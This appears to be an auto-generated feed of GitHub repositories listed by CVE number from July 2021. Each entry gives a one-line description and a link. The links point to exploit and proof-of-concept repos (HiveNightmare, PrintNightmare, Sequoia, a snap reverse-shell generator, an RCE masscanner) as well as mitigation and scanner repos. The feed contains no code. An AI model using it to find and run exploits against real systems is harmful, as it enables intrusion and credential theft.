**CVE-2021-3560 (Polkit - Local Privilege Escalation)** : [deathflash1411/CVE-2021-3560](https://github.com/deathflash1411/CVE-2021-3560) create time: 2021-07-26T07:08:36Z

**Exploit code for CVE-2021-33909,Just a dump of removed https://github.com/AmIAHuman/ repo** : [bbinfosec43/CVE-2021-33909](https://github.com/bbinfosec43/CVE-2021-33909) create time: 2021-07-26T03:24:35Z

**This PowerShell script will take the mitigation measures for CVE-2021-36934 described by Microsoft and the US CERT team. https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934 https://kb.cert.org/vuls/id/506989 USE AT YOUR OWN RISK -- BACKUPS MAY BREAK.** : [jmaddington/Serious-Sam---CVE-2021-36934-Mitigation-for-Datto-RMM](https://github.com/jmaddington/Serious-Sam---CVE-2021-36934-Mitigation-for-Datto-RMM) create time: 2021-07-25T18:00:35Z

**CVE-2021–36934, Exploit allowing you to read any registry hives as non-admin.** : [wolf0x/HiveNightmare](https://github.com/wolf0x/HiveNightmare) create time: 2021-07-25T14:39:31Z

**HiveNightmare/SeriousSAM(CVE_2021_36934)** : [AttackTeamFamily/HiveNightmare](https://github.com/AttackTeamFamily/HiveNightmare) create time: 2021-07-25T13:19:50Z

**Python PoC for CVE-2020-35846 targeting Cockpit 0.11.1** : [JohnHammond/CVE-2020-35846](https://github.com/JohnHammond/CVE-2020-35846) create time: 2021-07-25T05:05:14Z

**PoC for CVE-2021-36934 Aka HiveNightmare/SeriousSAM fully written in python3** : [Sp00p64/PyNightmare](https://github.com/Sp00p64/PyNightmare) create time: 2021-07-25T00:31:11Z

**Spotweb 1.4.9 - 'search' SQL Injection** : [bousalman/CVE-2020-35545](https://github.com/bousalman/CVE-2020-35545) create time: 2021-07-24T18:12:35Z

**PoC for exploiting CVE-2019-10181 : It was found that in icedtea-web up to and including 1.7.2 and 1.8.2 executable code could be injected in a JAR file without compromising the signature verification. An attacker could use this flaw to inject code in a trusted JAR. The code would be executed inside the sandbox.** : [AlAIAL90/CVE-2019-10181](https://github.com/AlAIAL90/CVE-2019-10181) create time: 2021-07-24T12:33:56Z

**PoC for exploiting CVE-2020-14409 : SDL (Simple DirectMedia Layer) through 2.0.12 has an Integer Overflow (and resultant SDL_memcpy heap corruption) in SDL_BlitCopy in video/SDL_blit_copy.c via a crafted .BMP file.** : [AlAIAL90/CVE-2020-14409](https://github.com/AlAIAL90/CVE-2020-14409) create time: 2021-07-24T12:33:49Z

**PoC for exploiting CVE-2020-14410 : SDL (Simple DirectMedia Layer) through 2.0.12 has a heap-based buffer over-read in Blit_3or4_to_3or4__inversed_rgb in video/SDL_blit_N.c via a crafted .BMP file.** : [AlAIAL90/CVE-2020-14410](https://github.com/AlAIAL90/CVE-2020-14410) create time: 2021-07-24T12:33:43Z

**PoC for exploiting CVE-2020-13959 : The default error page for VelocityView in Apache Velocity Tools prior to 3.1 reflects back the vm file that was entered as part of the URL. An attacker can set an XSS payload file as this vm file in the URL which results in this payload being executed. XSS vulnerabilities allow attackers to execute arbitrary JavaScript in the context of the attacked website and the attacked user. This can be abused to steal session cookies, perform requests in the name of the victim or for phishing attacks.** : [AlAIAL90/CVE-2020-13959](https://github.com/AlAIAL90/CVE-2020-13959) create time: 2021-07-24T12:33:37Z

**PoC for exploiting CVE-2020-13936 : An attacker that is able to modify Velocity templates may execute arbitrary Java code or run arbitrary system commands with the same privileges as the account running the Servlet container. This applies to applications that allow untrusted users to upload/modify velocity templates running Apache Velocity Engine versions up to 2.2.** : [AlAIAL90/CVE-2020-13936](https://github.com/AlAIAL90/CVE-2020-13936) create time: 2021-07-24T12:33:32Z

**PoC for exploiting CVE-2020-36277 : Leptonica before 1.80.0 allows a denial of service (application crash) via an incorrect left shift in pixConvert2To8 in pixconv.c.** : [AlAIAL90/CVE-2020-36277](https://github.com/AlAIAL90/CVE-2020-36277) create time: 2021-07-24T12:33:26Z

**PoC for exploiting CVE-2020-36280 : Leptonica before 1.80.0 allows a heap-based buffer over-read in pixReadFromTiffStream, related to tiffio.c.** : [AlAIAL90/CVE-2020-36280](https://github.com/AlAIAL90/CVE-2020-36280) create time: 2021-07-24T12:33:20Z

**PoC for exploiting CVE-2020-36278 : Leptonica before 1.80.0 allows a heap-based buffer over-read in findNextBorderPixel in ccbord.c.** : [AlAIAL90/CVE-2020-36278](https://github.com/AlAIAL90/CVE-2020-36278) create time: 2021-07-24T12:33:14Z

**PoC for exploiting CVE-2020-36279 : Leptonica before 1.80.0 allows a heap-based buffer over-read in rasteropGeneralLow, related to adaptmap_reg.c and adaptmap.c.** : [AlAIAL90/CVE-2020-36279](https://github.com/AlAIAL90/CVE-2020-36279) create time: 2021-07-24T12:33:08Z

**PoC for exploiting CVE-2020-36281 : Leptonica before 1.80.0 allows a heap-based buffer over-read in pixFewColorsOctcubeQuantMixed in colorquant1.c.** : [AlAIAL90/CVE-2020-36281](https://github.com/AlAIAL90/CVE-2020-36281) create time: 2021-07-24T12:33:02Z

**C# PoC for CVE-2021-36934/HiveNightmare/SeriousSAM** : [cube0x0/CVE-2021-36934](https://github.com/cube0x0/CVE-2021-36934) create time: 2021-07-24T12:55:05Z

**PoC for exploiting CVE-2021-28906 : In function read_yin_leaf() in libyang <= v1.0.225, it doesn't check whether the value of retval->ext[r] is NULL. In some cases, it can be NULL, which leads to the operation of retval->ext[r]->flags that results in a crash.** : [AlAIAL90/CVE-2021-28906](https://github.com/AlAIAL90/CVE-2021-28906) create time: 2021-07-24T12:32:56Z

**PoC for exploiting CVE-2021-28905 : In function lys_node_free() in libyang <= v1.0.225, it asserts that the value of node->module can't be NULL. But in some cases, node->module can be null, which triggers a reachable assertion (CWE-617).** : [AlAIAL90/CVE-2021-28905](https://github.com/AlAIAL90/CVE-2021-28905) create time: 2021-07-24T12:32:50Z

**PoC for exploiting CVE-2021-28904 : In function ext_get_plugin() in libyang <= v1.0.225, it doesn't check whether the value of revision is NULL. If revision is NULL, the operation of strcmp(revision, ext_plugins[u].revision) will lead to a crash.** : [AlAIAL90/CVE-2021-28904](https://github.com/AlAIAL90/CVE-2021-28904) create time: 2021-07-24T12:32:43Z

**PoC for exploiting CVE-2021-28903 : A stack overflow in libyang <= v1.0.225 can cause a denial of service through function lyxml_parse_mem(). lyxml_parse_elem() function will be called recursively, which will consume stack space and lead to crash.** : [AlAIAL90/CVE-2021-28903](https://github.com/AlAIAL90/CVE-2021-28903) create time: 2021-07-24T12:32:37Z

**PoC for exploiting CVE-2021-28902 : In function read_yin_container() in libyang <= v1.0.225, it doesn't check whether the value of retval->ext[r] is NULL. In some cases, it can be NULL, which leads to the operation of retval->ext[r]->flags that results in a crash.** : [AlAIAL90/CVE-2021-28902](https://github.com/AlAIAL90/CVE-2021-28902) create time: 2021-07-24T12:32:31Z

**no description** : [Hydragyrum/CVE-2019-20933](https://github.com/Hydragyrum/CVE-2019-20933) create time: 2021-07-24T11:12:13Z

**This Repo is PoC environment of CVE-2014-6271(https://nvd.nist.gov/vuln/detail/cve-2014-6271).** : [mochizuki875/CVE-2014-6271-Apache-Debian](https://github.com/mochizuki875/CVE-2014-6271-Apache-Debian) create time: 2021-07-24T07:47:55Z

**no description** : [azu/msgpack-CVE-2021-23410-test](https://github.com/azu/msgpack-CVE-2021-23410-test) create time: 2021-07-24T01:05:02Z

**Exploit Analysis of The WhatsApp Double-Free Vulnerability (CVE-2019-11932) Using the GEF-GDB Debugger** : [k3vinlusec/WhatsApp-Double-Free-Vulnerability_CVE-2019-11932](https://github.com/k3vinlusec/WhatsApp-Double-Free-Vulnerability_CVE-2019-11932) create time: 2021-07-23T21:29:56Z

**https://www.zerodayinitiative.com/advisories/ZDI-20-712/** : [k3vinlusec/R7000_httpd_BOF_CVE-2020-15416](https://github.com/k3vinlusec/R7000_httpd_BOF_CVE-2020-15416) create time: 2020-10-09T23:42:50Z

**This is a RCE bluetooth vulnerability on Android 8.0 and 9.0** : [k3vinlusec/Bluefrag_CVE-2020-0022](https://github.com/k3vinlusec/Bluefrag_CVE-2020-0022) create time: 2020-07-01T00:23:33Z

**Exploit for HiveNightmare - CVE-2021–36934** : [FireFart/hivenightmare](https://github.com/FireFart/hivenightmare) create time: 2021-07-23T06:36:08Z

**no description** : [3t4n/samba-3.0.24-CVE-2007-2447-vunerable-](https://github.com/3t4n/samba-3.0.24-CVE-2007-2447-vunerable-) create time: 2021-07-23T03:19:10Z

**CVE-2021-36934 PowerShell scripts** : [bytesizedalex/CVE-2021-36934](https://github.com/bytesizedalex/CVE-2021-36934) create time: 2021-07-22T21:54:45Z

**A script to generate malicious snap package, and gain reverse shell connection, simulating CVE-2019-7304 attack** : [RyouYoo/dirty_snap](https://github.com/RyouYoo/dirty_snap) create time: 2021-07-22T14:47:38Z

**Windows Elevation of Privilege Vulnerability (SeriousSAM)** : [VertigoRay/CVE-2021-36934](https://github.com/VertigoRay/CVE-2021-36934) create time: 2021-07-22T14:53:09Z

**no description** : [zoukba0014/cve-2021-44444](https://github.com/zoukba0014/cve-2021-44444) create time: 2021-07-22T14:47:06Z

**no description** : [KISH84172/CVE-2019-11933](https://github.com/KISH84172/CVE-2019-11933) create time: 2021-07-22T13:45:00Z

**no description** : [haerin7427/CVE_2020_1938](https://github.com/haerin7427/CVE_2020_1938) create time: 2021-07-22T12:34:12Z

**CVE-2021-36934 PowerShell Fix** : [tda90/CVE-2021-36934](https://github.com/tda90/CVE-2021-36934) create time: 2021-07-22T12:24:24Z

**A capability to identify and remediate CVE-2021-36934 (HiveNightmare)** : [WiredPulse/Invoke-HiveDreams](https://github.com/WiredPulse/Invoke-HiveDreams) create time: 2021-07-22T12:10:41Z

**see https://github.com/cube0x0/CVE-2021-1675** : [hahaleyile/my-CVE-2021-1675](https://github.com/hahaleyile/my-CVE-2021-1675) create time: 2021-07-22T10:49:30Z

**HiveNightmare a.k.a. SeriousSam Local Privilege Escalation in Windows – CVE-2021-36934** : [romarroca/SeriousSam](https://github.com/romarroca/SeriousSam) create time: 2021-07-22T07:49:29Z

**no description** : [1111one/laravel-CVE-2021-3129-EXP](https://github.com/1111one/laravel-CVE-2021-3129-EXP) create time: 2021-07-22T07:35:04Z

**PoC for CVE-2021-36934, which enables a standard user to be able to retrieve the SAM, Security, and Software Registry hives in Windows 10 version 1809 or newer** : [WiredPulse/Invoke-HiveNightmare](https://github.com/WiredPulse/Invoke-HiveNightmare) create time: 2021-07-22T03:07:56Z

**Small and dirty PoC for CVE-2021-36934** : [Wh04m1001/VSSCopy](https://github.com/Wh04m1001/VSSCopy) create time: 2021-07-22T00:55:23Z

**Python Implementation of CVE-2020-23934** : [zyeinn/CVE-2020-23934](https://github.com/zyeinn/CVE-2020-23934) create time: 2021-07-21T18:26:23Z

**Bypass intended access control in Plex Media Server (CVE-2018-21031)** : [manmolecular/tautulli-cve-2018-21031](https://github.com/manmolecular/tautulli-cve-2018-21031) create time: 2021-07-21T18:02:41Z

**no description** : [zyeinn/CVE-2020-23934](https://github.com/zyeinn/CVE-2020-23934) create time: 2021-07-21T18:22:48Z

**This module fixes an issue in the kernels filesystem layer (CVE-2021-33909) by kprobe-replacing vulnerable functions during runtime** : [baerwolf/cve-2021-33909](https://github.com/baerwolf/cve-2021-33909) create time: 2021-07-21T18:22:55Z

**Detection and Mitigation script for CVE-2021-36934 (HiveNightmare aka. SeriousSam)** : [n3tsurge/CVE-2021-36934](https://github.com/n3tsurge/CVE-2021-36934) create time: 2021-07-21T17:24:44Z

**Sequoia exploit (7/20/21)** : [Liang2580/CVE-2021-33909](https://github.com/Liang2580/CVE-2021-33909) create time: 2021-07-21T04:04:49Z

**Fix for the CVE-2021-36934** : [JoranSlingerland/CVE-2021-36934](https://github.com/JoranSlingerland/CVE-2021-36934) create time: 2021-07-21T13:06:51Z

**Pure Nim implementation for exploiting CVE-2021-36934, the SeriousSAM local privilege escalation** : [HuskyHacks/ShadowSteal](https://github.com/HuskyHacks/ShadowSteal) create time: 2021-07-20T22:16:49Z

**Sequoia exploit (7/20/21)** : [AmIAHuman/CVE-2021-33909](https://github.com/AmIAHuman/CVE-2021-33909) create time: 2021-07-20T23:00:44Z

**no description** : [cseasholtz/CVE-2021-36747](https://github.com/cseasholtz/CVE-2021-36747) create time: 2021-07-20T18:45:30Z

**no description** : [cseasholtz/CVE-2021-36746](https://github.com/cseasholtz/CVE-2021-36746) create time: 2021-07-20T18:45:12Z

**Atlassian Jira unauthen template injection** : [PetrusViet/CVE-2019-11581](https://github.com/PetrusViet/CVE-2019-11581) create time: 2021-05-04T06:30:47Z

**no description** : [madhans23/libpcap-with-Fix-CVE-2019-15165](https://github.com/madhans23/libpcap-with-Fix-CVE-2019-15165) create time: 2021-07-20T08:57:09Z

**no description** : [madhans23/libpcap-without-Fix-CVE-2019-15165](https://github.com/madhans23/libpcap-without-Fix-CVE-2019-15165) create time: 2021-07-20T07:18:17Z

**no description** : [Winter3un/CVE-2021-1675](https://github.com/Winter3un/CVE-2021-1675) create time: 2021-07-20T06:26:45Z

**no description** : [madhans23/libpcap-without-Fix-CVE-2019-15165](https://github.com/madhans23/libpcap-without-Fix-CVE-2019-15165) create time: 2021-07-20T05:41:47Z

**An extended proof-of-concept for the CVE-2021-21551 Dell ‘dbutil_2_3.sys’ Kernel Exploit.** : [mzakocs/CVE-2021-21551-POC](https://github.com/mzakocs/CVE-2021-21551-POC) create time: 2021-06-02T05:13:07Z

**ETS5 Password Recovery Tool is a PoC for CVE-2021-36799** : [robertguetzkow/ets5-password-recovery](https://github.com/robertguetzkow/ets5-password-recovery) create time: 2021-07-18T13:59:43Z

**PoC of SQL Injection vul(CVE-2020-9483,Apache SkyWalking)** : [Neko2sh1ro/CVE-2020-9483](https://github.com/Neko2sh1ro/CVE-2020-9483) create time: 2021-07-19T06:50:17Z

**CVE-2021-22213** : [TheCryingGame/CVE-2021-22213](https://github.com/TheCryingGame/CVE-2021-22213) create time: 2021-07-19T03:19:05Z

**TEST** : [Henry4E36/CVE-2021-99999](https://github.com/Henry4E36/CVE-2021-99999) create time: 2021-07-19T03:10:50Z

**no description** : [3hydraking/CVE-2019-16278](https://github.com/3hydraking/CVE-2019-16278) create time: 2021-07-19T00:45:07Z

**no description** : [3hydraking/CVE-2019-9053](https://github.com/3hydraking/CVE-2019-9053) create time: 2021-07-18T20:37:30Z

**no description** : [14601/CVE-2020-14882](https://github.com/14601/CVE-2020-14882) create time: 2021-07-02T09:38:21Z

**systeminformation** : [MazX0p/CVE-2021-21315-exploit](https://github.com/MazX0p/CVE-2021-21315-exploit) create time: 2021-07-18T01:18:31Z

**pendingintent vulnerability** : [MazX0p/CVE-2014-8609-POC](https://github.com/MazX0p/CVE-2014-8609-POC) create time: 2021-07-17T16:29:58Z

**no description** : [yuhaishenedc/CVE2016_off_path](https://github.com/yuhaishenedc/CVE2016_off_path) create time: 2021-07-17T00:53:07Z

**no description** : [cgwalters/container-cve-2021-22555](https://github.com/cgwalters/container-cve-2021-22555) create time: 2021-07-16T19:12:57Z

**no description** : [thalpius/Microsoft-CVE-2021-1675](https://github.com/thalpius/Microsoft-CVE-2021-1675) create time: 2021-07-16T18:06:05Z

**Tool to check whether a PGP client is affected by CVE-2021-33560** : [IBM/PGP-client-checker-CVE-2021-33560](https://github.com/IBM/PGP-client-checker-CVE-2021-33560) create time: 2021-07-16T15:24:11Z

**no description** : [3hydraking/CVE-2017-7269](https://github.com/3hydraking/CVE-2017-7269) create time: 2021-07-16T07:02:27Z

**no description** : [1stPeak/CVE-2019-2725-environment](https://github.com/1stPeak/CVE-2019-2725-environment) create time: 2021-07-16T07:14:53Z

**CVE-2021-3493 Ubuntu漏洞** : [derek-turing/CVE-2021-3493](https://github.com/derek-turing/CVE-2021-3493) create time: 2021-07-16T04:02:54Z

**CVE-2021-22555 Exploit** : [JustYoomoon/CVE-2021-22555-Exploit](https://github.com/JustYoomoon/CVE-2021-22555-Exploit) create time: 2021-07-16T01:40:52Z

**no description** : [3hydraking/CVE-2009-2265](https://github.com/3hydraking/CVE-2009-2265) create time: 2021-07-15T23:14:11Z

**no description** : [3hydraking/CVE-2015-6668](https://github.com/3hydraking/CVE-2015-6668) create time: 2021-07-15T21:58:15Z

**no description** : [JoneyJunior/cve-2021-22555](https://github.com/JoneyJunior/cve-2021-22555) create time: 2021-07-15T10:17:42Z

**no description** : [fkm75P8YjLkb/CVE-2012-1870](https://github.com/fkm75P8YjLkb/CVE-2012-1870) create time: 2021-07-15T04:33:10Z

**no description** : [fkm75P8YjLkb/CVE-2021-26690](https://github.com/fkm75P8YjLkb/CVE-2021-26690) create time: 2021-07-15T04:38:43Z

**no description** : [fkm75P8YjLkb/CVE-2021-26691](https://github.com/fkm75P8YjLkb/CVE-2021-26691) create time: 2021-07-15T04:37:58Z

**no description** : [fkm75P8YjLkb/CVE-2021-30641](https://github.com/fkm75P8YjLkb/CVE-2021-30641) create time: 2021-07-15T04:31:58Z

**no description** : [fkm75P8YjLkb/CVE-2021-3516](https://github.com/fkm75P8YjLkb/CVE-2021-3516) create time: 2021-07-15T04:29:56Z

**no description** : [fkm75P8YjLkb/CVE-2021-34496](https://github.com/fkm75P8YjLkb/CVE-2021-34496) create time: 2021-07-15T04:23:58Z

**Exploit for CVE-2020-15778(OpenSSH vul)** : [yukiNeko114514/CVE-2020-15778-Exploit](https://github.com/yukiNeko114514/CVE-2020-15778-Exploit) create time: 2021-07-15T01:04:24Z

**no description** : [puckiestyle/CVE-2021-30461](https://github.com/puckiestyle/CVE-2021-30461) create time: 2021-07-14T19:20:11Z

**no description** : [TheWay-hue/CVE-2017-5689-Checker](https://github.com/TheWay-hue/CVE-2017-5689-Checker) create time: 2021-07-14T14:26:29Z

**no description** : [hacker-ali-17/CVE-2021-50126](https://github.com/hacker-ali-17/CVE-2021-50126) create time: 2021-07-14T12:29:21Z

**no description** : [1stPeak/CVE-2020-0796-Scanner](https://github.com/1stPeak/CVE-2020-0796-Scanner) create time: 2021-07-14T06:38:05Z

**no description** : [Mochican/CVE-2021-10086](https://github.com/Mochican/CVE-2021-10086) create time: 2021-07-14T03:38:36Z

**CVE-2020-25134 Authenticated Local File Inclusion in settings/format** : [ynsmroztas/CVE-2020-25134](https://github.com/ynsmroztas/CVE-2020-25134) create time: 2021-07-13T05:29:30Z

**no description** : [alexzorin/cve-2021-34558](https://github.com/alexzorin/cve-2021-34558) create time: 2021-07-13T06:15:21Z

**no description** : [Karma2424/cve2019-2215-3.18](https://github.com/Karma2424/cve2019-2215-3.18) create time: 2021-07-13T02:40:09Z

**A patch for PrintNightmare vulnerability that occurs to print spooler service for Windows machines [CVE-2021-34527]** : [0xIrison/PrinterNightmare-Patcher](https://github.com/0xIrison/PrinterNightmare-Patcher) create time: 2021-07-12T14:14:29Z

**no description** : [huydoppa/CVE-2021-24347-](https://github.com/huydoppa/CVE-2021-24347-) create time: 2021-07-12T09:02:47Z

**CVE-2021-34527 - PrintNightmare LPE (PowerShell)** : [galoget/PrintNightmare-CVE-2021-34527](https://github.com/galoget/PrintNightmare-CVE-2021-34527) create time: 2021-07-12T08:18:40Z

**CVE-2020-24148 Proof-of-Concept** : [dwisiswant0/CVE-2020-24148](https://github.com/dwisiswant0/CVE-2020-24148) create time: 2021-07-12T02:01:26Z

**no description** : [3hydraking/CVE-2015-1635](https://github.com/3hydraking/CVE-2015-1635) create time: 2021-07-12T00:37:54Z

**no description** : [3hydraking/CVE-2015-1635-POC](https://github.com/3hydraking/CVE-2015-1635-POC) create time: 2021-07-12T00:23:30Z

**no description** : [aristosMiliaressis/CVE-2021-21985](https://github.com/aristosMiliaressis/CVE-2021-21985) create time: 2021-07-11T20:38:19Z

**Scanner for CVE-2020-1938** : [yukiNeko114514/CVE-2020-1938](https://github.com/yukiNeko114514/CVE-2020-1938) create time: 2021-07-11T14:38:21Z

**no description** : [k8gege/cve-2021-1675](https://github.com/k8gege/cve-2021-1675) create time: 2021-07-11T03:48:25Z

**no description** : [AndrewIjano/CVE-2020-8277](https://github.com/AndrewIjano/CVE-2020-8277) create time: 2021-07-10T20:42:11Z

**no description** : [3hydraking/CVE-2011-1249](https://github.com/3hydraking/CVE-2011-1249) create time: 2021-07-10T19:27:23Z

**no description** : [IlRabbino/Internet-Security-Project---CVE-2021-26814](https://github.com/IlRabbino/Internet-Security-Project---CVE-2021-26814) create time: 2021-07-10T16:04:28Z

**SQL injection via unsanitized QuerySet.order_by() input** : [YouGina/CVE-2021-35042](https://github.com/YouGina/CVE-2021-35042) create time: 2021-07-10T12:38:52Z

**A fix for PrintNightmare vulnerability that occurs to print spoolers for Windows machines [CVE-2021-34527]** : [0xIrison/PrintNightmare_Resolver](https://github.com/0xIrison/PrintNightmare_Resolver) create time: 2021-07-10T08:21:28Z

**Experimenting with the CVE-2020-14343 PyYAML vulnerability** : [raul23/pyyaml-CVE-2020-14343](https://github.com/raul23/pyyaml-CVE-2020-14343) create time: 2021-06-27T06:56:15Z

**A collection of scripts to help set the appropriate registry keys for CVE-2021-34527** : [syntaxbearror/PowerShell-PrintNightmare](https://github.com/syntaxbearror/PowerShell-PrintNightmare) create time: 2021-07-09T21:28:16Z

**no description** : [3hydraking/CVE-2019-6447](https://github.com/3hydraking/CVE-2019-6447) create time: 2021-07-09T19:21:29Z

**Fix for PrintNightmare CVE-2021-34527** : [Eutectico/Printnightmare](https://github.com/Eutectico/Printnightmare) create time: 2021-07-09T09:22:03Z

**no description** : [dywhoami/CVE-2021-34527-Scanner-Based-On-cube0x0-POC](https://github.com/dywhoami/CVE-2021-34527-Scanner-Based-On-cube0x0-POC) create time: 2021-07-09T08:27:36Z

**no description** : [3hydraking/CVE-2019-5736](https://github.com/3hydraking/CVE-2019-5736) create time: 2021-07-08T22:46:30Z

**CVE-2021-34527 implementation** : [glorisonlai/printnightmare](https://github.com/glorisonlai/printnightmare) create time: 2021-07-08T18:56:04Z

**ms08_067 ( Python3 Script)** : [3hydraking/MS08_067_CVE-2008-4250](https://github.com/3hydraking/MS08_067_CVE-2008-4250) create time: 2021-07-07T14:58:26Z

**no description** : [3hydraking/MS17-010_CVE-2017-0143](https://github.com/3hydraking/MS17-010_CVE-2017-0143) create time: 2021-07-08T17:35:50Z

**no description** : [3hydraking/usermap_script_CVE-2007-2447](https://github.com/3hydraking/usermap_script_CVE-2007-2447) create time: 2021-07-01T21:58:36Z

**A CVE-2013-2028 implementation** : [jptr218/nginxhack](https://github.com/jptr218/nginxhack) create time: 2021-07-08T17:17:34Z

**no description** : [bartimus-primed/CVE-2021-1675-Yara](https://github.com/bartimus-primed/CVE-2021-1675-Yara) create time: 2021-07-08T16:18:52Z

**Dlink credentials decryption tool poc** : [full-disclosure/FDEU-CVE-2021-525A](https://github.com/full-disclosure/FDEU-CVE-2021-525A) create time: 2021-07-08T10:14:12Z

**no description** : [haiclover/CVE-2021-21985](https://github.com/haiclover/CVE-2021-21985) create time: 2021-07-08T04:45:19Z

**no description** : [huydoppa/CVE-2018-15877](https://github.com/huydoppa/CVE-2018-15877) create time: 2021-07-08T07:41:41Z

**CVE test** : [arch3rPro/CVE-2020-22222](https://github.com/arch3rPro/CVE-2020-22222) create time: 2021-07-08T01:42:54Z

**Mitigation for CVE-2021-34527 RCE by setting WRITE ACLs - Setting Modify Deny ACLs can cause other issues and is not recommended** : [WidespreadPandemic/CVE-2021-34527_ACL_mitigation](https://github.com/WidespreadPandemic/CVE-2021-34527_ACL_mitigation) create time: 2021-07-08T01:32:18Z

**CVE-2020-1956** : [b510/CVE-2020-1956](https://github.com/b510/CVE-2020-1956) create time: 2021-07-08T00:58:07Z

**no description** : [corelight/CVE-2021-1675](https://github.com/corelight/CVE-2021-1675) create time: 2021-07-02T16:44:24Z

**Information on the Windows Spooler vulnerability - CVE-2021-1675; CVE 2021 34527** : [JumpsecLabs/PrintNightmare](https://github.com/JumpsecLabs/PrintNightmare) create time: 2021-07-07T08:32:09Z

**How to fix the PrintNightmare vulnerability** : [powershellpr0mpt/PrintNightmare-CVE-2021-34527](https://github.com/powershellpr0mpt/PrintNightmare-CVE-2021-34527) create time: 2021-07-07T07:58:53Z

**Simple batch script to disable the Microsoft Print Spooler service from system** : [vinaysudheer/Disable-Spooler-Service-PrintNightmare-CVE-2021-34527](https://github.com/vinaysudheer/Disable-Spooler-Service-PrintNightmare-CVE-2021-34527) create time: 2021-07-07T06:41:15Z

**no description** : [inspiringz/CVE-2021-3493](https://github.com/inspiringz/CVE-2021-3493) create time: 2021-07-07T06:16:48Z

**Tool to take advantage of CVE-2019-6447** : [mcmahonr/cve-2019-6447](https://github.com/mcmahonr/cve-2019-6447) create time: 2021-07-06T23:13:55Z

**A vulnerability scanner for CVE-2020-1472 aka Zerologon.** : [NickSanzotta/zeroscan](https://github.com/NickSanzotta/zeroscan) create time: 2021-06-23T12:23:48Z

**A PrintNightmare (CVE-2021-3457) Python Scanner. Scan entire subnets for hosts vulnerable to the PrintNightmare RCE** : [byt3bl33d3r/ItWasAllADream](https://github.com/byt3bl33d3r/ItWasAllADream) create time: 2021-07-05T20:13:49Z

**To check if Spooler is on and whether is it vulnerable to CVE 2021-34527** : [yyhh91/PrintNightMareChecker](https://github.com/yyhh91/PrintNightMareChecker) create time: 2021-07-06T02:07:24Z

**Exploits Password Reset Vulnerability in OpenCRX, CVE-2020-7378. Also maintains Stealth by deleting all the password reset mails created by the script** : [ruthvikvegunta/openCRX-CVE-2020-7378](https://github.com/ruthvikvegunta/openCRX-CVE-2020-7378) create time: 2021-07-06T00:36:18Z

**Disable remote sessions to print spooler withtout disabling the print spooler service** : [officedrone/CVE-2021-34527-workaround](https://github.com/officedrone/CVE-2021-34527-workaround) create time: 2021-07-05T20:02:50Z

**no description** : [geekbrett/CVE-2021-34527-PrintNightmare-Workaround](https://github.com/geekbrett/CVE-2021-34527-PrintNightmare-Workaround) create time: 2021-07-05T17:50:56Z

**Workaround for Windows Print Spooler Remote Code Execution Vulnerability(CVE-2021-34527). See: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527** : [rdboboia/disable-RegisterSpoolerRemoteRpcEndPoint](https://github.com/rdboboia/disable-RegisterSpoolerRemoteRpcEndPoint) create time: 2021-07-05T16:49:32Z

**OpenEMR < 5.0.1.4 - (Authenticated) File upload - Remote command execution** : [sec-it/exploit-CVE-2018-15139](https://github.com/sec-it/exploit-CVE-2018-15139) create time: 2021-07-05T16:03:38Z

**CVE-2021-1675 (PrintNightmare)** : [sailay1996/PrintNightmare-LPE](https://github.com/sailay1996/PrintNightmare-LPE) create time: 2021-07-05T14:17:03Z

**no description** : [edsonjt81/CVE-2021-1675](https://github.com/edsonjt81/CVE-2021-1675) create time: 2021-07-05T12:10:43Z

**Exploit Accsess network clients by sending packets in wirless TP-LINK and preparing for a mitm attack** : [lhashashinl/CVE-2021-37152](https://github.com/lhashashinl/CVE-2021-37152) create time: 2021-07-05T08:37:52Z

**no description** : [lwzSoviet/CVE-2021-3281](https://github.com/lwzSoviet/CVE-2021-3281) create time: 2021-07-05T08:25:26Z

**no description** : [adarshvs/CVE-2020-3580](https://github.com/adarshvs/CVE-2020-3580) create time: 2021-06-28T06:51:26Z

**Masscanner for Laravel phpunit RCE CVE-2017-9841** : [r00td3v/lavarel-phpunit-rce-masscaner](https://github.com/r00td3v/lavarel-phpunit-rce-masscaner) create time: 2021-07-04T16:15:27Z

**no description** : [zxn1/CVE-2019-11932](https://github.com/zxn1/CVE-2019-11932) create time: 2021-07-04T17:07:19Z

**no description** : [CnOxx1/CVE-2021-34527-1675](https://github.com/CnOxx1/CVE-2021-34527-1675) create time: 2021-07-04T16:09:18Z

**no description** : [dorkerdevil/CVE-2021-21975](https://github.com/dorkerdevil/CVE-2021-21975) create time: 2021-03-31T13:33:45Z

**Youtube : https://youtu.be/Zr0KjYDSFKQ** : [exploitblizzard/PrintNightmare-CVE-2021-1675](https://github.com/exploitblizzard/PrintNightmare-CVE-2021-1675) create time: 2021-07-04T09:50:39Z

**Windows Print Spooler Remote Code Execution Vulnerability (CVE-2021-34527)** : [nemo-wq/CVE-2021-1675_CVE-2021-34527_PrintNightmare](https://github.com/nemo-wq/CVE-2021-1675_CVE-2021-34527_PrintNightmare) create time: 2021-07-03T15:15:12Z

**Exploit for MS Http Protocol Stack RCE vulnerability (CVE-2021-31166)** : [y0g3sh-99/CVE-2021-31166-Exploit](https://github.com/y0g3sh-99/CVE-2021-31166-Exploit) create time: 2021-07-03T14:54:59Z

**Windows Print Spooler Service RCE CVE-2021-1675 (PrintNightmare)** : [ozergoker/PrintNightmare](https://github.com/ozergoker/PrintNightmare) create time: 2021-07-03T12:25:21Z

**no description** : [MrRobotTnT/CVE-2016-3088](https://github.com/MrRobotTnT/CVE-2016-3088) create time: 2021-07-03T10:23:59Z

**PentesterLab's CVE-2018-6574 exercise** : [rizemon/CVE-2018-6574](https://github.com/rizemon/CVE-2018-6574) create time: 2021-07-03T09:01:52Z

**随便放点自己弄的小东西** : [yukiNeko114514/CVE-2020-0674-PoC](https://github.com/yukiNeko114514/CVE-2020-0674-PoC) create time: 2021-07-03T04:17:35Z

**利用14882的未授权访问漏洞,结合14883可直接远程命令执行** : [N0Coriander/CVE-2020-14882-14883](https://github.com/N0Coriander/CVE-2020-14882-14883) create time: 2021-07-03T02:02:42Z

**to catch cve-2021-1675-printnightmare** : [initconf/cve-2021-1675-printnightmare](https://github.com/initconf/cve-2021-1675-printnightmare) create time: 2021-07-03T01:04:06Z

**A temporary mitigation to the CVE-2021-1675. Print Spooler will be disabled during non-business hours.** : [gohrenberg/CVE-2021-1675-Mitigation-For-Systems-That-Need-Spooler](https://github.com/gohrenberg/CVE-2021-1675-Mitigation-For-Systems-That-Need-Spooler) create time: 2021-07-02T21:18:11Z

